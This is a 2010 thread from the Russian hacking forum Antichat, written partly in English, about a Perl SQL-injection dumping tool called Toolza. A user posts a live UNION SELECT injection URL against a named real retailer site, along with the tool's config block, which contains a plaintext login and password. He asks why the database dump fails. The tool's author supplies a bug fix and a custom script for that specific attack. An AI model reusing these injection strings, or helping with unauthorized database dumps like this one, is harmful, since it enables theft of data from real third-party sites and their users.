Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.03.2010, 01:26
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
https - это огромный плюс.
Остальное тоже на уровне.
софтинка то что надо.
|
|
|
07.03.2010, 15:50
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
вообще то на данный момент самый лучшый прога для слива бд. Жал что без GUI хотя бы до запуска самого дампа надо сделать интерфейс для настройки. Это реализовал кто то на World Fastest MD5 cracker BarsWF написав GUI (BarsWF launcher)
правда та прога не на перле(знаю что оч гемор написать GUI для перл) но все таки по теме привел пример.
Кстати sql_ocb_public от ачата тоже с GUI реализовано )) |
|
|
|
14.03.2010, 01:28
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Pashkela бро пересмотри на тулзе функцию name_const и floor rand у обеих все норм выводит таблы но когда дело дойдет до колонок то придется по одному выводит а инфо с колонок а не несколько например user_id,username сразу не выводит
|
|
|
|
14.03.2010, 01:45
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
пример студию!
PS: А вообще в некоторых случаях может быть ограничение длины строки запроса
|
|
|
|
16.03.2010, 16:06
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
hello
i want to injection in mysql vulnerable site
http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,2,3
and 2 columns is printable field
i am trying to get information of this site through Toolza i edit 1 line in toolza.pl
i edit like this
################################################## ################################################## #####################################
## Основные настройки MySQL - вместо принтабельного поля поставьте " ^ " |MySql Basic options - print " ^ " instead of printable field #
################################################## ################################################## #####################################
$source_sql = "http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,^,3";
$filtr = "--"; # close SQL
$plus = "+"; # /**/,%20,%2b & etc.
$limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
$unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
$aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
$aes_key = "0x71"; # AES key
and when i run toolza.pl and want to get information it get nothing and give like this only
system information:
Request method - Post
Threads - 10
proxy - no
saved in z_www.milliontreeproject.co.uk.txt
why i am not getting information ???
please help me
thank you
|
|
|
|
16.03.2010, 17:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
There is some trouble with parsing page via sockets, thanks for bug report, so new parameter in the script in global settings:
$get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple - if can't get DATA
but be careful, proxies, socks are not supported in this case and only GET method supported
download script from first post
PS: $filtr = ""; # close SQL
doesn't matter in the given concrete case, but be attentive
Последний раз редактировалось Pashkela; 16.03.2010 в 18:37..
|
|
|
|
16.03.2010, 18:44
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
Hi
can you please tell me where is download script from first post ???
and where will i put this line ($get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple)
in global settings for all modes
################################################## ########################
## Глобальные настройки для всех режимов | Global settings for all modes ##
################################################## #########################
$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$use_proxy = 0; # 0 - без прокси; 1 - c прокси | 1 -Use proxy; 0 - No proxy
$proxy = "proxy.txt"; # Файл с проксями | Proxy file
$use_socks = 0; # 0 - без socks; 1 - c socks | 1 -Use socks; 0 - No socks
$socks_file = "socks.txt";# Файл с SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
$kol_threads = 10; # Кол-во потоков, рекомендуется -10 | Number of threads - 10 recommended
$timeout = 10; # Таймаут в секундах | Timeout in seconds
$cookie = ""; # Если кук нет - поставить "" | If no coockie set ""
$https_mode_auth = 1; # 1 - whith authorization, 0 - no
$https_auth_script_path = "/signin.php";
$https_auth_post_data = "uname=watltd&passwd=drowssap&Submit=Sign+In";
$referer = "http://google.com"; # Реферер, если нет поставить "" | If no referer set ""
$user_agent = "Opera/9.25 (Windows NT 6.0; U; en)"; # Юзер агент, если нет поставить "" | If no user agent set ""
$http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
$pause = 0; # Пауза между запросами в секундах | Pause between requests in seconds
Thank you
|
|
|
|
16.03.2010, 18:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Последний раз редактировалось Pashkela; 16.03.2010 в 18:50..
|
|
|
|
16.03.2010, 19:06
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
Hi
still getting same error from using new version
 |
|
|
|
16.03.2010, 19:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
))) script for you only ====> click |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
